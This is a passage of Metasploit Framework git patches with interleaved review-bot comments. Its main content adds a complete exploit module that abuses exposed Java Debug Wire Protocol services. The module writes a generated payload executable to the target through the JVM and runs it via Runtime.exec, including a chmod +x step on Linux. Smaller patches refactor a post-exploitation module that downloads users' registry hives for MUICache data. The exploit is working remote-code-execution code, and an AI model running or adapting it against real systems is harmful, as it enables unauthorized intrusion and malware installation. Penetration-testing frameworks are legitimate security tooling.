@@ -96,7 +96,12 @@ class Metasploit3 < Msf::Post # that the user is most likely not logged in and we'll need to # download and process users hive locally. print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") - results = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) || [] + result = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) + unless result.nil? + result.each { |r| + results << r unless r.nil? + } + end else # If the registry_enumvals returns us content we'll know that we # can access the registry directly and thus continue to process @@ -160,7 +165,12 @@ class Metasploit3 < Msf::Post hive_status = false 3.times do - remote_hive_hash_raw = file_remote_digestmd5(hive_path) + begin + remote_hive_hash_raw = file_remote_digestmd5(hive_path) + rescue EOFError, ::Rex::Post::Meterpreter::RequestError + next + end + if remote_hive_hash_raw.blank? next end From 9627bae98b8594a2985a9bbe90869bf627f752bd Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Thu, 29 May 2014 23:45:44 +0200 Subject: [PATCH 415/853] Add JDWP RCE for Windows and Linux --- .../exploits/multi/misc/java_jdwp_debugger.rb | 969 ++++++++++++++++++ 1 file changed, 969 insertions(+) create mode 100755 modules/exploits/multi/misc/java_jdwp_debugger.rb diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb new file mode 100755 index 0000000000..dd0be92a3b --- /dev/null +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
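Review bot: The multi-line `{ ... }` block that copies `result` into `results` in enumerate_muicache can be one expression, `results.concat(result.compact) if result`, which drops the same nil entries the loop filters out. This is a style point only; the other multi-line blocks visible in this file use `do ... end`.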
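Review bot: The new `rescue EOFError, ::Rex::Post::Meterpreter::RequestError` in hive_download_status continues with `next` and records nothing, so three failed digest requests surface only as the caller's generic "All registry hive download attempts failed" message. Binding the exception and logging it keeps the cause visible: `rescue EOFError, ::Rex::Post::Meterpreter::RequestError => e` followed by `vprint_error("Digest request for #{hive_path} failed: #{e.class} #{e}")`. The `session.fs.file.download_file` call further down sits outside the `begin` block; if it can raise the same errors (not visible here), it would still abort the module. The method body continues outside the hunk.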
@@ -0,0 +1,969 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::CheckCode
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+
+ HANDSHAKE = "JDWP-Handshake"
+
+ REQUEST_PACKET_TYPE = 0x00
+ REPLY_PACKET_TYPE = 0x80
+
+ # Command signatures
+ VERSION_SIG = [1, 1]
+ CLASSESBYSIGNATURE_SIG = [1, 2]
+ ALLCLASSES_SIG = [1, 3]
+ ALLTHREADS_SIG = [1, 4]
+ IDSIZES_SIG = [1, 7]
+ CREATESTRING_SIG = [1, 11]
+ SUSPENDVM_SIG = [1, 8]
+ RESUMEVM_SIG = [1, 9]
+ SIGNATURE_SIG = [2, 1]
+ FIELDS_SIG = [2, 4]
+ METHODS_SIG = [2, 5]
+ GETVALUES_SIG = [2, 6]
+ CLASSOBJECT_SIG = [2, 11]
+ INVOKESTATICMETHOD_SIG = [3, 3]
+ CREATENEWINSTANCE_SIG = [3, 4]
+ REFERENCETYPE_SIG = [9, 1]
+ INVOKEMETHOD_SIG = [9, 6]
+ STRINGVALUE_SIG = [10, 1]
+ THREADNAME_SIG = [11, 1]
+ THREADSUSPEND_SIG = [11, 2]
+ THREADRESUME_SIG = [11, 3]
+ THREADSTATUS_SIG = [11, 4]
+ EVENTSET_SIG = [15, 1]
+ EVENTCLEAR_SIG = [15, 2]
+ EVENTCLEARALL_SIG = [15, 3]
+
+ # Other codes
+ MODKIND_COUNT = 1
+ MODKIND_THREADONLY = 2
+ MODKIND_CLASSMATCH = 5
+ MODKIND_LOCATIONONLY = 7
+ EVENT_BREAKPOINT = 2
+ SUSPEND_EVENTTHREAD = 1
+ SUSPEND_ALL = 2
+ NOT_IMPLEMENTED = 99
+ VM_DEAD = 112
+ INVOKE_SINGLE_THREADED = 2
+ TAG_OBJECT = 76
+ TAG_STRING = 115
+ TYPE_CLASS = 1
+ TAG_ARRAY = 91
+ TAG_VOID = 86
+
+
+ def initialize
+ super(
+ 'Name' => 'Java Debugging Wire Protocol Scanner',
+ 'Description' => %q{
+ This module abuses exposed Java Debugging Wire Protocol services in order
+ to execute code remotely.
+ },
+ 'Author' => [
+
+ 'Christophe Alladoum', # Exploit
+ 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'],
+ ['http://www.exploit-db.com/papers/27179/'],
+ ['https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'],
+ ['http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html']
+ ],
+ 'DisclosureDate' => 'May 29 2014',
+ 'License' => MSF_LICENSE,
+ 'Platform' => %w{ linux win },
+ 'Privileged' => true,
+ 'Payload' => { 'BadChars' => '', 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ]
+ ],
+ 'DefaultTarget' => 1
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8000),
+ OptInt.new('STATUS_EVERY', [true, 'How many iterations until status', 1000]),
+ OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
+ OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload.
Ensure there is a trailing slash', nil]) + ], self.class) + + register_advanced_options( + [ + OptString.new('BREAK_CLASS', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), + OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), + OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) + ], self.class) + end + + def check + connect + + vprint_status("#{peer} - Checking for Java Debugging Wire Protocol") + + sock.put(HANDSHAKE) + + res = sock.get(datastore['RESPONSE_TIMEOUT']) + + disconnect + + unless res + vprint_error("Unable to determine due to a connection timeout") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears if res == HANDSHAKE + + return Exploit::CheckCode::Safe + + end + + + # Establishes handshake with the server + def handshake + vprint_status("#{peer} - Sending the handshake...") + + sock.put(HANDSHAKE) + + res = sock.get(datastore['RESPONSE_TIMEOUT']) + + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res + + return res == HANDSHAKE + end + + # Forges packet for JDWP protocol + def create_packet(cmdsig, data="") + flags = 0x00 + + cmdset, cmd = cmdsig + + pktlen = data.length + 11 + + buf = [pktlen, @myid, flags, cmdset, cmd] + + pkt = buf.pack("NNCCC") + + pkt << data + + @myid += 2 + + return pkt + end + + # Reads packet response for JDWP protocol + def read_reply(timeout) + + response = sock.get(timeout) + + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response + + pktlen,id,flags,errcode = response.unpack('NNCn') + + response.slice!(0..10) + + fail_with(Failure::Unknown, "Server sent error with code #{errcode}") if (errcode != 0) && (flags == REPLY_PACKET_TYPE) + + return response + end + + # Returns the characters contained in the string defined in target VM + def solve_string(data) + + sock.put(create_packet(STRINGVALUE_SIG, data)) + + response 
= read_reply(datastore['RESPONSE_TIMEOUT']) + + return "" unless response + + return read_string(response) + + end + + # Unpacks received string structure from the server response into a normal string + def read_string(data) + + data_len = data.unpack('N')[0] + + data.slice!(0..3) + + return data.slice!(0,data_len) + + end + + # Creates a new string object in the target VM and returns its id + def create_string(data) + buf = build_string(data) + + sock.put(create_packet(CREATESTRING_SIG, buf)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) + + end + + # Packs normal string into string structure for target VM + def build_string(data) + ret = [data.length].pack('N') + ret << data + + return ret + + end + + + # Pack Fixnum for JDWP protocol + def format(fmt, value) + if fmt == "L" || fmt == 8 + return [value].pack('Q>') + elsif fmt == "I" || fmt == 4 + return [value].pack('N') + end + + fail_with(Failure::Unknown, "Unknown format") + + end + + # Unpack Fixnum from JDWP protocol + def unformat(fmt, value) + if fmt == "L" || fmt == 8 + return value[0..7].unpack('Q>')[0] + elsif fmt == "I" || fmt == 4 + return value[0..3].unpack('N')[0] + end + + fail_with(Failure::Unknown, "Unknown format") + end + + # Parses given data according to a set of formats + def parse_entries(buf, formats, explicit=true) + entries = [] + + if explicit + nb_entries = buf.unpack('N')[0] + buf.slice!(0..3) + else + nb_entries = 1 + end + + nb_entries.times do |var| + + print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0 + + data = {} + + formats.each { |fmt,name| + if fmt == "L" or fmt == 8 + data[name] = buf.unpack('Q>')[0] + buf.slice!(0..7) + elsif fmt == "I" or fmt == 4 + data[name] = buf.unpack('N')[0] + buf.slice!(0..3) + elsif fmt == "S" + data_len = buf.unpack('N')[0] + buf.slice!(0..3) + data[name] = buf.slice!(0,data_len) + 
elsif fmt == "C" + data[name] = buf.unpack('C')[0] + buf.slice!(0) + elsif fmt == "Z" + t = buf.unpack('C')[0] + buf.slice!(0) + if t == 115 + data[name] = solve_string(buf.slice!(0..7)) + elsif t == 73 + data[name], buf = buf.unpack('NN') + end + else + fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") + end + + } + entries.append(data) + end + + return entries + end + + + # Gets the sizes of variably-sized data types in the target VM + def idsizes + + sock.put(create_packet(IDSIZES_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + ["I", "fieldid_size"], + ["I", "methodid_size"], + ["I", "objectid_size"], + ["I", "referencetypeid_size"], + ["I", "frameid_size"] + ] + + entries = parse_entries(response, formats, false) + + entries.each { |entry| + entry.each{ |name,value| + @vars[name] = value + } + } + + end + + + # Gets the JDWP version implemented by the target VM + def get_version + + sock.put(create_packet(VERSION_SIG)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + ["S", "descr"], + ["I", "jdwp_major"], + ["I", "jdwp_minor"], + ["S", "vm_version"], + ["S", "vm_name"] + ] + + entries = parse_entries(response, formats, false) + + entries.each { |entry| + entry.each{ |name,value| + @vars[name] = value + } + } + + end + + + def version + return "#{@vars["vm_name"]} - #{@vars["vm_version"]}" + end + + + # Returns reference types for all classes currently loaded by the target VM + def all_classes + + return unless @classes.empty? 
+ + sock.put(create_packet(ALLCLASSES_SIG)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + ["C", "reftype_tag"], + [@vars["referencetypeid_size"], "reftype_id"], + ["S", "signature"], + ["I", "status"] + ] + + print_status("#{peer} - Parsing list of classes...") + + @classes.append(parse_entries(response, formats)) + + end + + # Checks if specified class is currently loaded by the target VM and returns it + def get_class_by_name(name) + + @classes.each { |entry_array| + + entry_array.each { |entry| + + return entry if entry["signature"].downcase == name.downcase + } + } + + nil + end + + # Returns information for each method in a reference type (ie. object). Inherited methods are not included. + # The list of methods will include constructors (identified with the name "<init>") + def get_methods(reftype_id) + + unless @methods.has_key?(reftype_id) + + refid = format(@vars["referencetypeid_size"],reftype_id) + + sock.put(create_packet(METHODS_SIG, refid)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + [@vars["methodid_size"], "method_id"], + ["S", "name"], + ["S", "signature"], + ["I", "mod_bits"] + ] + + @methods[reftype_id] = parse_entries(response, formats) + + end + + return @methods[reftype_id] + end + + # Checks if specified method is currently loaded by the target VM and returns it + def get_method_by_name(classname, name, signature = nil) + + @methods[classname].each { |entry| + if signature.nil? 
+ return entry if entry["name"].downcase == name.downcase + else + return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase) + end + } + + nil + end + + + # Checks if specified class and method are currently loaded by the target VM and returns them + def get_class_and_method(looked_class, looked_method, signature = nil) + + target_class = get_class_by_name(looked_class) + + fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") unless target_class + + get_methods(target_class["reftype_id"]) + + target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) + + fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method + + return target_class, target_method + + end + + + # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") + def str2fqclass(s) + + i = s.rindex(".") + + fail_with(Failure::BadConfig, 'Bad defined break class') unless i + + method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string + + classname = 'L' + classname << s[0..i-1].gsub(/[.]/, '/') + classname << ';' + + return classname, method + + end + + + # Resumes execution of the application after the suspend command or an event has stopped it + def resume_vm + sock.put(create_packet(RESUMEVM_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + fail_with(Exploit::Failure::Unknown, "No network response") unless response + end + + + # Sets an event request. 
When the event described by this request occurs, an event is sent from the target VM + def send_event(event_code, args) + + data = [event_code].pack('C') + data << [SUSPEND_ALL].pack('C') + data << [args.length].pack('N') + + args.each { |kind,option| + + data << [kind].pack('C') + data << option + + } + + sock.put(create_packet(EVENTSET_SIG, data)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + fail_with(Exploit::Failure::Unknown, "No network response") unless response + + return response.unpack('N')[0] + + end + + + # Waits user defined time for an event sent from the target VM (or force event if possible) + def wait_for_event + + buf = read_reply(datastore['BREAK_TIMEOUT']) + + return buf + end + + + # Parses a received event and compares it with the expected + def parse_event_breakpoint(buf, event_id) + + num = buf[2..5].unpack('N')[0] + r_id = buf[6..9].unpack('N')[0] + + return nil unless event_id == r_id + + len = @vars["objectid_size"] + + t_id = unformat(len,buf[10..10+len-1]) + + return r_id, t_id + + end + + + # Clear a defined event request + def clear_event(event_code, r_id) + data = [event_code].pack('C') + data << [r_id].pack('N') + + sock.put(create_packet(EVENTCLEAR_SIG, data)) + + read_reply(datastore['RESPONSE_TIMEOUT']) + end + + + # Invokes a static method. The method must be member of the class type or one of its superclasses, + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. 
+ def invoke_static(class_id, thread_id, meth_id, args = []) + + data = format(@vars["referencetypeid_size"], class_id) + data << format(@vars["objectid_size"], thread_id) + data << format(@vars["methodid_size"], meth_id) + data << [args.length].pack('N') + + args.each { |arg| + + data << arg + data << [0].pack('N') + + } + + sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return buf + + end + + + # Invokes a instance method. The method must be member of the object's type or one of its superclasses, + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. + def invoke(obj_id, thread_id, class_id, meth_id, args = []) + + data = format(@vars["objectid_size"], obj_id) + data << format(@vars["objectid_size"], thread_id) + + data << format(@vars["referencetypeid_size"], class_id) + + data << format(@vars["methodid_size"], meth_id) + + data << [args.length].pack('N') + + args.each { |arg| + + data << arg + data << [0].pack('N') + + } + + sock.put(create_packet(INVOKEMETHOD_SIG, data)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return buf + + end + + + # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. 
+ def create_instance(class_id, thread_id, meth_id, args = []) + + data = format(@vars["referencetypeid_size"], class_id) + data << format(@vars["objectid_size"], thread_id) + data << format(@vars["methodid_size"], meth_id) + data << [args.length].pack('N') + + args.each { |arg| + + data << arg + data << [0].pack('N') + + } + + sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return buf + + end + + + def temp_path + return nil unless datastore['TMP_PATH'] + unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') + fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') + end + datastore['TMP_PATH'] + end + + + # Configures payload according to targeted architecture + def setup_payload + + # 1. Setting up generic values. + payload_exe = rand_text_alphanumeric(4 + rand(4)) + pl_exe = generate_payload_exe + + # 2. Setting up arch specific... + case target['Platform'] + when 'linux' + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" + when 'windows' + path = temp_path || './' + payload_exe = "#{path}#{payload_exe}.exe" + else + fail_with(Failure::NoTarget, 'Unsupported target platform') + end + + + return payload_exe, pl_exe + end + + # Invokes java.lang.System.getProperty() for OS fingerprinting purposes + def fingerprint_os(thread_id) + + size = @vars["objectid_size"] + + # 1. Creates a string on target VM with the property to be getted + cmd_obj_ids = create_string("os.name") + + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + + cmd_obj_id = cmd_obj_ids[0]["obj_id"] + + # 2. 
Gets property + data = [TAG_OBJECT].pack('C') + data << format(size, cmd_obj_id) + + data_array = [data] + + runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty") + + buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C') + + str = unformat(size, buf[1..1+size-1]) + + @os = solve_string(format(@vars["objectid_size"],str)) + + end + + # Creates a file on the server given a execution thread + def create_file(thread_id, filename) + + cmd_obj_ids = create_string(filename) + + fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0 + + cmd_obj_id = cmd_obj_ids[0]["obj_id"] + + size = @vars["objectid_size"] + + data = [TAG_OBJECT].pack('C') + data << format(size, cmd_obj_id) + + data_array = [data] + + runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V") + + buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + + file = unformat(size, buf[1..1+size-1]) + + fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? 
|| (file == 0)
+
+ register_files_for_cleanup(filename)
+
+ return file
+
+ end
+
+
+ # Stores the payload on a new string created in target VM
+ def upload_payload(thread_id, pl_exe)
+
+ size = @vars["objectid_size"]
+
+ runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
+
+ buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+
+ fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
+
+ decoder = unformat(size, buf[1..1+size-1])
+
+ fail_with(Failure::Unknown, "Failed to create Base64 decoder object") if decoder.nil? || (decoder == 0)
+
+ cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}")
+
+ fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
+
+ cmd_obj_id = cmd_obj_ids[0]["obj_id"]
+
+ data = [TAG_OBJECT].pack('C')
+ data << format(size, cmd_obj_id)
+
+ data_array = [data]
+
+ runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
+
+ buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
+
+ fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") unless buf[0] == [TAG_ARRAY].pack('C')
+
+ pl = unformat(size, buf[1..1+size-1])
+
+ return pl
+
+ end
+
+ # Dumps the payload on a opened server file given a execution thread
+ def dump_payload(thread_id, file, pl)
+
+ size = @vars["objectid_size"]
+
+ data = [TAG_OBJECT].pack('C')
+ data << format(size, pl)
+
+ data_array = [data]
+
+ runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
+
+ buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
+
+ fail_with(Failure::Unknown, "Exception ocurred when writing to file") unless buf[0] == [TAG_VOID].pack('C')
+
+ end
+
+ # Closes a 
file on the server given a execution thread
+ def close_file(thread_id, file)
+
+ size = @vars["objectid_size"]
+
+ runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
+
+ buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
+
+ fail_with(Failure::Unknown, "Exception ocurred when closing file") unless buf[0] == [TAG_VOID].pack('C')
+
+ end
+
+
+ # Executes a system command on target VM making use of java.lang.Runtime.exec()
+ def execute_command(thread_id, cmd)
+
+ size = @vars["objectid_size"]
+
+ # 1. Creates a string on target VM with the command to be executed
+ cmd_obj_ids = create_string(cmd)
+
+ fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
+
+ cmd_obj_id = cmd_obj_ids[0]["obj_id"]
+
+ # 2. Gets Runtime context
+ runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
+
+ buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
+
+ fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
+
+ rt = unformat(size, buf[1..1+size-1])
+
+ fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") if rt.nil? || (rt == 0)
+
+ # 3. Finds and executes "exec" method supplying the string with the command
+ exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
+
+ fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") if exec_meth.nil? 
+
+ data = [TAG_OBJECT].pack('C')
+ data << format(size, cmd_obj_id)
+
+ data_array = [data]
+
+ buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
+
+ fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
+
+ end
+
+
+ # Sets a breakpoint on frequently called method (user-defined)
+ def set_breakpoint
+
+ vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAK_CLASS']}")
+
+ # 1. Gets reference of the method where breakpoint is going to be setted
+ classname, method = str2fqclass(datastore['BREAK_CLASS'])
+
+ break_class = get_class_by_name(classname)
+
+ fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, possible is not used by application") unless break_class
+
+ get_methods(break_class["reftype_id"])
+
+ m = get_method_by_name(break_class["reftype_id"], method)
+
+ fail_with(Failure::BadConfig, "Method of Break Class not found") unless m
+
+ # 2. Sends event request for this method
+ loc = [TYPE_CLASS].pack('C')
+ loc << format(@vars["referencetypeid_size"], break_class["reftype_id"])
+ loc << format(@vars["methodid_size"], m["method_id"])
+ loc << [0,0].pack('NN')
+
+ data = [[MODKIND_LOCATIONONLY, loc]]
+
+ r_id = send_event(EVENT_BREAKPOINT, data)
+
+ fail_with(Failure::Unknown, "Could not set the breakpoint") unless r_id
+
+ return r_id
+ end
+
+
+ # Uploads & executes the payload on the target VM
+ def exec_payload(thread_id)
+
+ # 0. Fingerprinting OS
+ fingerprint_os(thread_id)
+
+ vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}")
+
+ # 1. Prepares the payload
+ payload_exe, pl_exe = setup_payload
+
+ # 2. Creates file on server for dumping payload
+ file = create_file(thread_id, payload_exe)
+
+ # 3. Uploads payload to the server
+ pl = upload_payload(thread_id, pl_exe)
+
+ # 4. Dumps uploaded payload into file on the server
+ dump_payload(thread_id, file, pl)
+
+ # 5. 
Closes the file on the server
+ close_file(thread_id, file)
+
+ # 5b. When linux arch, give execution permissions to file
+ cmd = "chmod +x #{payload_exe}"
+ execute_command(thread_id, cmd) if target['Platform'] == 'linux'
+
+ # 6. Executes the dumped payload
+ cmd = "#{payload_exe}"
+ execute_command(thread_id, cmd)
+
+ end
+
+
+ def exploit
+
+ @myid = 0x01
+ @vars = {}
+ @classes = []
+ @methods = {}
+ @os = nil
+
+
+ check
+
+ connect
+
+ fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake
+
+ # 1. Get the sizes of variably-sized data types in the target VM
+ idsizes
+
+ # 2. Get the version of the target VM
+ get_version
+
+ # 3. Get all currently loaded classes by the target VM
+ all_classes
+
+ # 4. Sets a breakpoint on frequently called method (user-defined)
+ r_id = set_breakpoint
+
+ # 5. Resume VM and wait for event
+ resume_vm
+
+ secs = datastore['BREAK_TIMEOUT']
+
+ ret = ""
+
+ datastore['NUM_RETRIES'].times do |i|
+
+ print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
+
+ buf = wait_for_event()
+
+ ret = parse_event_breakpoint(buf, r_id)
+
+ break unless ret.nil?
+
+ end
+
+ r_id, t_id = ret
+
+ vprint_status("#{peer} - Received matching event from thread #{t_id}")
+
+ # 6. Clears event
+ clear_event(EVENT_BREAKPOINT, r_id)
+
+ # 7. Drop & execute payload
+ exec_payload(t_id)
+
+ resume_vm
+
+ disconnect
+
+ end
+end
\ No newline at end of file
From 31c282153e35e98d45a9a6245825a69dc362a8db Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:02:28 -0500 Subject: [PATCH 416/853] Avoid ntuser.dat md5 because is causing problems, even when data is extracted --- modules/post/windows/gather/enum_muicache.rb | 61 ++++---------------- 1 file changed, 11 insertions(+), 50 deletions(-)
diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb
index bd3fa53ec3..a18335a25a 100644 
--- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -85,18 +85,17 @@ class Metasploit3 < Msf::Post def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) results = [] - loot_path = Msf::Config::loot_directory all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths) all_user_entries.each do |user, reg_key, sys_path| - local_hive_copy = ::File.join(loot_path, "#{sysinfo['Computer']}_#{user}_HIVE_#{::Time.now.utc.strftime('%Y%m%d.%M%S')}") + subkeys = registry_enumvals(reg_key) if subkeys.blank? # If the registry_enumvals returns us nothing then we'll know # that the user is most likely not logged in and we'll need to # download and process users hive locally. - print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") - result = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) + print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + result = process_hive(sys_path, user, muicache, hive_file) unless result.nil? result.each { |r| results << r unless r.nil? 
@@ -137,60 +136,24 @@ class Metasploit3 < Msf::Post # downloading the hive. After successfull download it'll continue to # call the hive_parser function which will extract the contents of # the MUICache registry key. - def process_hive(sys_path, user, local_hive_copy, muicache, hive_file) + def process_hive(sys_path, user, muicache, hive_file) user_home_path = expand_path(sys_path) hive_path = user_home_path + hive_file ntuser_status = file_exist?(hive_path) unless ntuser_status == true - print_error("Couldn't locate/download #{user}'s registry hive. Can't proceed.") + print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.") return nil end print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") - hive_status = hive_download_status(local_hive_copy, hive_path) + local_hive_copy = Rex::Quickfile.new("jtrtmp") + local_hive_copy.close + session.fs.file.download_file(local_hive_copy.path, hive_path) + results = hive_parser(local_hive_copy.path, muicache, user) + local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles - unless hive_status == true - print_error("All registry hive download attempts failed. Unable to continue.") - return nil - end - - hive_parser(local_hive_copy, muicache, user) - end - - # This function downloads registry hives and checks for integrity - # after the transfer has completed so that we don't end up - # processing broken registry hive. - def hive_download_status(local_hive_copy, hive_path) - hive_status = false - - 3.times do - begin - remote_hive_hash_raw = file_remote_digestmd5(hive_path) - rescue EOFError, ::Rex::Post::Meterpreter::RequestError - next - end - - if remote_hive_hash_raw.blank? 
- next - end - - remote_hive_hash = remote_hive_hash_raw.unpack('H*') - session.fs.file.download_file(local_hive_copy, hive_path) - local_hive_hash = file_local_digestmd5(local_hive_copy) - if local_hive_hash == remote_hive_hash[0] - print_good("Hive downloaded successfully.") - hive_status = true - break - else - print_error("Hive download corrupted, trying again (max 3 times)..") - File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made - hive_status = false - end - - end - - hive_status + results end # This function is responsible for parsing the downloaded hive and @@ -231,8 +194,6 @@ class Metasploit3 < Msf::Post end end - File.delete(local_hive_copy) # Downloaded hive gets deleted after processing - results end From f2a71a47ca93aadbfd0e35521f34551431c6cf4e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:04:38 -0500 Subject: [PATCH 417/853] Use \&\& instead of and --- modules/post/windows/gather/enum_muicache.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index a18335a25a..89fd17f3e6 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post # the content collected from there. print_status("User #{user}: Enumerating registry..") subkeys.each do |key| - if key[0] != "@" and key != "LangID" and not key.nil? + if key[0] != "@" && key != "LangID" && !key.nil? result = check_file_exists(key, user) results << result unless result.nil? 